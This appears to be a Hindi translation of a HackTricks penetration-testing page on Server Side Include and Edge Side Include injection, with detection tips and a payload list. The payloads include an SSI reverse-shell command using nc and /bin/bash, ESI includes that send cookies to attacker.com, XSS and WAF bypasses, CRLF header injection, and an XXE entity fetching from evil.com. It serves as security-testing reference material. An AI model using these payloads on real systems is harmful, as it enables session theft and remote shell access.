hacktricks/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md

# सर्वर साइड इनक्लूजन/एज साइड इनक्लूजन इंजेक्शन

<details>

<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.

</details>

## सर्वर साइड इनक्लूजन मूल जानकारी

SSI (सर्वर साइड इनक्लूड्स) निर्देश होते हैं जो **HTML पेजों में रखे जाते हैं, और सर्वर पर मूल्यांकन किए जाते हैं** जबकि पेज सर्व किए जा रहे होते हैं। वे आपको **एक मौजूदा HTML पेज में गतिशील रूप से जनरेटेड कंटेंट जोड़ने** की अनुमति देते हैं, बिना पूरे पेज को CGI प्रोग्राम, या अन्य गतिशील तकनीक के माध्यम से सर्व करने की आवश्यकता के।\
उदाहरण के लिए, आप एक मौजूदा HTML पेज में एक निर्देश डाल सकते हैं, जैसे:

`<!--#echo var="DATE_LOCAL" -->`

और, जब पेज सर्व किया जाता है, यह खंड मूल्यांकन किया जाएगा और इसके मूल्य के साथ बदल दिया जाएगा:

`Tuesday, 15-Jan-2013 19:28:54 EST`

SSI का उपयोग कब करना है, और कब आपके पेज को पूरी तरह से किसी प्रोग्राम द्वारा जनरेट किया जाना है, यह आमतौर पर इस बात का मामला होता है कि पेज का कितना हिस्सा स्थिर है, और कितना हर बार पेज सर्व किए जाने पर पुनः गणना की जरूरत है। SSI छोटी जानकारी के टुकड़े जोड़ने का एक शानदार तरीका है, जैसे कि ऊपर दिखाया गया वर्तमान समय। लेकिन अगर आपके पेज का अधिकांश हिस्सा उस समय जनरेट किया जा रहा है जब वह सर्व किया जा रहा है, तो आपको किसी अन्य समाधान की तलाश करनी चाहिए। (परिभाषा [यहाँ](https://httpd.apache.org/docs/current/howto/ssi.html) से ली गई है)।

यदि वेब एप्लिकेशन \*\* `.shtml`, `.shtm` या `.stm`\*\* एक्सटेंशन वाली फाइलों का उपयोग करता है तो आप SSI की उपस्थिति का अनुमान लगा सकते हैं, लेकिन यह केवल मामला नहीं है।

एक विशिष्ट SSI अभिव्यक्ति का निम्नलिखित प्रारूप होता है:
```
<!--#directive param="value" -->
```
### जांच
```javascript
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

```
## एज साइड इनक्लूजन

जानकारी या डायनामिक एप्लिकेशन्स को **कैशिंग** करने में एक समस्या है क्योंकि सामग्री का कुछ हिस्सा अगली बार सामग्री प्राप्त करते समय **भिन्न** हो सकता है। यही कारण है कि **ESI** का उपयोग किया जाता है, ESI टैग्स का उपयोग करके **डायनामिक सामग्री को जनरेट करने** के लिए संकेत देने के लिए, जिसे कैश संस्करण भेजने से पहले बनाया जाना चाहिए।\
यदि एक **हमलावर** कैश सामग्री के अंदर एक ESI टैग **इंजेक्ट** करने में सक्षम होता है, तो, वह उपयोगकर्ताओं को भेजे जाने से पहले दस्तावेज़ पर **मनमानी सामग्री इंजेक्ट** कर सकता है।

### ESI का पता लगाना

सर्वर से प्रतिक्रिया में निम्नलिखित **हेडर** का मतलब है कि सर्वर ESI का उपयोग कर रहा है:
```
Surrogate-Control: content="ESI/1.0"
```
यदि आप इस हेडर को नहीं ढूंढ पा रहे हैं, तो सर्वर **फिर भी ESI का उपयोग कर रहा हो सकता है**।\
एक **अंधा शोषण दृष्टिकोण भी इस्तेमाल किया जा सकता है** क्योंकि एक अनुरोध हमलावर के सर्वर पर पहुंचना चाहिए:
```javascript
// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>
```
### ESI शोषण

[GoSecure](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) ने हमें समझाने के लिए एक तालिका बनाई है कि हम विभिन्न ESI-सक्षम सॉफ्टवेयर के खिलाफ कौन से हमले कर सकते हैं, जो कार्यक्षमता का समर्थन करते हैं। नीचे दी गई तालिका के कॉलम नामों के बारे में कुछ स्पष्टीकरण देते हैं:

* **Includes**: `<esi:includes>` निर्देश का समर्थन करता है
* **Vars**: `<esi:vars>` निर्देश का समर्थन करता है। XSS फिल्टर्स को बायपास करने के लिए उपयोगी
* **Cookie**: दस्तावेज़ कुकीज़ ESI इंजन के लिए सुलभ हैं
* **Upstream Headers Required**: सरोगेट एप्लिकेशन ESI वक्तव्यों को प्रोसेस नहीं करेंगे जब तक कि अपस्ट्रीम एप्लिकेशन हेडर्स प्रदान नहीं करता
* **Host Allowlist**: इस मामले में, ESI शामिल केवल अनुमति वाले सर्वर होस्ट्स से ही संभव हैं, जिससे SSRF, उदाहरण के लिए, केवल उन होस्ट्स के खिलाफ ही संभव है

|         **सॉफ्टवेयर**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
| :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
|            Squid3            |      हाँ     |    हाँ   |     हाँ     |              हाँ              |         नहीं         |
|         Varnish Cache        |      हाँ     |    नहीं    |      नहीं     |              हाँ              |         हाँ        |
|            Fastly            |      हाँ     |    नहीं    |      नहीं     |               नहीं              |         हाँ        |
| Akamai ESI Test Server (ETS) |      हाँ     |    हाँ   |     हाँ     |               नहीं              |         नहीं         |
|          NodeJS esi          |      हाँ     |    हाँ   |     हाँ     |               नहीं              |         नहीं         |
|         NodeJS nodesi        |      हाँ     |    नहीं    |      नहीं     |               नहीं              |      वैकल्पिक      |

#### XSS

निम्न ESI निर्देश सर्वर के प्रतिक्रिया में एक मनमानी फाइल लोड करेगा
```markup
<esi:include src=http://attacker.com/xss.html>
```
#### क्लाइंट XSS सुरक्षा को बायपास करें
```markup
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
```
#### कुकी चुराना

* दूरस्थ कुकी चुराना
```markup
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
```
* XSS का उपयोग करके HTTP\_ONLY कुकी को प्रतिबिंबित करके चुराएं:
```bash
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
```
#### निजी स्थानीय फ़ाइल

इसे "Local File Inclusion" से भ्रमित न करें:
```markup
<esi:include src="secret.txt">
```
#### CRLF
```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
#### ओपन रीडायरेक्ट

निम्नलिखित उत्तर में एक `Location` हेडर जोड़ देगा
```bash
<!--esi $add_header('Location','http://attacker.com') -->
```
#### हेडर जोड़ें

* जबरन अनुरोध में हेडर जोड़ें
```html
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
```
* प्रतिक्रिया में हेडर जोड़ें (XSS के साथ "Content-Type: text/json" प्रतिक्रिया को बायपास करने के लिए उपयोगी)
```bash
<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
```
<figure><img src="../.gitbook/assets/image (5) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>

#### Add header में CRLF (**CVE-2019-2438)**
```markup
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
```
#### अकामाई डीबग

यह प्रतिक्रिया में शामिल डीबग जानकारी भेजेगा:
```markup
<esi:debug/>
```
### ESI + XSLT = XXE

यह संभव है कि \*\* **\_**eXtensible Stylesheet Language Transformations (XSLT)**\_** \*\* आधारित ESI शामिल को `xslt` मान को _dca_ पैरामीटर में निर्दिष्ट करके जोड़ा जा सकता है। निम्नलिखित शामिल HTTP सरोगेट को XML और XSLT फाइल का अनुरोध करने का कारण बनेगा। XSLT फाइल का उपयोग XML फाइल को फ़िल्टर करने के लिए किया जाता है। इस XML फाइल का उपयोग _XML External Entity (XXE)_ हमलों को प्रदर्शन करने के लिए किया जा सकता है। यह हमलावरों को SSRF हमलों को प्रदर्शन करने की अनुमति देता है, जो बहुत उपयोगी नहीं है क्योंकि यह ESI शामिल के माध्यम से किया जाना चाहिए, जो खुद एक SSRF वेक्टर है। बाहरी DTDs को पार्स नहीं किया जाता है क्योंकि अंतर्निहित पुस्तकालय (Xalan) का इसके लिए समर्थन नहीं है। इसका मतलब है कि हम स्थानीय फाइलों को निकाल नहीं सकते।
```markup
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```
XSLT फ़ाइल:
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
```
XSLT पेज की जाँच करें:

{% content-ref url="xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-language-transformations.md](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
{% endcontent-ref %}

### संदर्भ

* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)

## ब्रूट-फोर्स डिटेक्शन सूची

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से हीरो तक AWS हैकिंग सीखें!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें.**
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.

</details>